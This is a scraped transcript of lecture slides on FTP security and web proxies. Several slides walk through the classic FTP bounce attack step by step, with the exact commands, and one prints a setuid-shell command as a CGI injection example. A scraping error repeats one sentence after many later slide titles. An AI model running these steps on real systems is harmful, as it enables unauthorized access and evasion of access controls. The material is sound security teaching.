Overview
Download
1 / 21

Overview - PowerPoint PPT Presentation


  • 181 Views
  • Uploaded on

Overview. Last Lecture Remote Terminal Services (SSH) This Lecture File transfer and web caching Next Lecture Directory services. FTP Basics. Clear-text protocol. Woefully insecure. Largely due to its dual-channel nature.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about ' Overview' - eshana


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
Overview
Overview

  • Last Lecture

    • Remote Terminal Services (SSH)

  • This Lecture

    • File transfer and web caching

  • Next Lecture

    • Directory services


Ftp basics
FTP Basics

  • Clear-text protocol.

  • Woefully insecure.

    • Largely due to its dual-channel nature.

    • Can be used in bounce attack (don’t trust traffic from your FTP server)

  • Use sftp or scp mechanisms instead for user-based access.


How ftp works
How FTP works?

control

server

21

20

data

client

Command: PORT IP_ADDR PORT_NUM

can ask the FTP server to connect any machine and port


Anonymous ftp
Anonymous FTP

  • Incoming directory

  • Default guest “password” (email addr.)

  • Download Accelerators

  • Run as standalone or inetd

  • Use HTTP instead


Ftp bounce attack
FTP bounce attack

  • Scenario

    • You are a user on foreign.fr, IP address x.x.x.x, and want to retrieve cryptographic source code from crypto.com in the US.

    • The FTP server at crypto.com is set up to allow your connection, but deny access to the crypto sources because your source IP address is that of a non-US site

    • However, crypto.com will allow ufred.edu to download crypto sources because ufred.edu is in the US too.

    • ufred.edu offers anonymous FTP and has a world-writable /incoming directory for anonymous users to drop files into.

    • Crypto.com's IP address is z.z.z.z.


Ftp bounce attack cont
FTP bounce attack (cont.)

21

20

Control connection

control

Ufred.edu

PORT x.x.x.x, yy

data

21

Data connection

yy

20

Crypto.com

Foreign.fr


  • Assuming you have an FTP server that does passive mode. Open an FTP connection to your own machine's real IP address [not localhost] and log in. Change to a convenient directory that you have write access to, and then do:

    • quote "pasv"

    • quote "stor foobar”

  • Take note of the address and port that are returned from the PASV command, x.x.x.x, yy. This FTP session will now hang, so background it or flip to another window or something to proceed with the following.


  • Construct a file containing FTP server commands. Let's call this file "instrs". It will look like this:

    • user ftp

    • pass -anonymous@

    • cwd /export-restricted-crypto

    • type i

    • port x,x,x,x,y,y

    • retr crypto.tar.Z

    • quit

    • ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@...

  • x,x,x,x,y,y is the same address and port that your own machine handed you on the first connection. The trash at the end is extra lines you create, each containing 250 NULLS and nothing else, enough to fill up about 60K of extra data. The reason for this filler is to keep the control TCP connection longer enough to ensure the data transfer to finish.


  • Open an FTP connection to ufred.edu, log in anonymously, and cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:

    • put instrs

    • quote "port C,C,C,C,0,21"

    • quote "retr instrs”

    • Note C.C.C.C is the IP address of crypto.com

  • Crypto.tar.Z should now show up as "foobar" on your machine via your first FTP connection.


Proxy cache
Proxy Cache cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:

  • Save Bandwidth/Money

  • Increase Performance – for static pages, multiple clients.

    • Most useful for images and other objects.

  • Client configured to send HTTP request via cache server.

    • FTP is handled also.

    • Can be auto-configured. (WPAD)


Http connect method
HTTP CONNECT Method cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:

  • Used for relaying (can’t cache) encrypted SSL connections.

  • Cache just passes the connection through.

    • CONNECT fnc.asbbank.co.nz:443 HTTP/1.1

    • Other users: AIM, PuTTY, Corkscrew...

  • This can be used to circumvent access control, esp if the proxy cache is trusted!


Cache hierarchies
Cache Hierarchies cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:

  • Parent proxies are commonly used, and are very useful when you can tap into a large proxy.

  • Internet Cache Protocol ICP (UDP, Multicast) can be used to query sibling cache proxies.


Non caching proxies
Non-Caching Proxies cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:

  • Some proxies provide other features, such as

    • Parental control

    • HTML rewriting

    • Security testing


Access control
Access Control cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:

  • You really must restrict access to known clients only.

  • User-based authentication

    • Don’t use the same password for Proxy as you do for system login (HTTP Basic Auth only.)

    • Enforce use of Proxy Cache for authentication. (firewall)


Transparent proxies
Transparent Proxies cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:

  • No client configuration, traffic savings. Attractive to ISPs.

  • Limitations

    • Cannot use password authentication.

    • HTTP 1.1 – proxy needs to find out what to connect to.

    • Source address will be that of the proxy cache.

      • X-Forwarded-For header (usually not logged)


Transparent proxies1
Transparent Proxies cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:

  • Router / Firewall sits in the path of traffic. Redirects TCP/80 connections to the proxy server.

  • Proxy server accepts the request, and using the Host header, finds out whether or not it can satisfy the request from cache or whether it needs to go to the server and get the page.

  • In smaller setups, proxy and router are on same machine.


Reverse proxies
Reverse Proxies cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:

  • aka HTTP Accelerators

  • Uses a Transparent Proxy in front of a dynamic web server.

  • Essentially a transparent proxy that accepts GET and POST requests from everyone, and only to a few machines.

  • Most useful when you have a lot of generated documents that will be the same.


Socks proxies
SOCKS Proxies cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:

  • Similar to the CONNECT method, but designed primarily for security, not caching.

  • Not just for web access, but for any TCP application.

  • Is a form of a firewall.

  • Each client application needs support, or have it wrapped in a replaced library.


Why cgi not secure
Why CGI not secure? cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:

  • CGI (Common Gateway Interface) used to be work with web servers

    • But it may cause security holes

  • Script command

    • `cp /bin/sh /tmp; chmod 4777 /tmp/sh`

  • If the command is executed by a CGI script, the consequence is obvious.

  • But how could that happen?


Resources
Resources cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:

  • Hacking Linux Exposed (2nd Edition)Brian Hatch & James Lee, ISBN 0-07-222564-5

  • Various useful documentswww.web-cache.com

  • Transparent Proxy HOWTOwww.tldp.org/HOWTO/TransparentProxy.html


Resources1
Resources cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:

  • RFC2617 – HTTP Authentication: Basic and Digest...

  • OWASP – The Open Web Application Security Projectwww.owasp.com

  • SANS Reading Roomwww.sans.org/rr


ad